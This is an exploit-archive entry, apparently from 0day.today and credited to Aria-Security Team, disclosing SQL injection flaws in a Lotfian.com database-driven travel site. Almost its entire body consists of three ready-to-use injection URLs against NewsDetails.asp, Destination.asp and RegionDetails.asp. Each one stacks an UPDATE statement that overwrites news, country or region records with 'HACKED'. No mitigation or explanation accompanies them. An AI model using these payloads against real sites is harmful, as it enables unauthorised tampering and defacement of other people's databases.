id: 2350
date: 12/10/2007
title: Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln
author: Aria-Security Team
cves: 

==========================================================
Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln
==========================================================



-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--



#  0day.today [2023-03-27]  #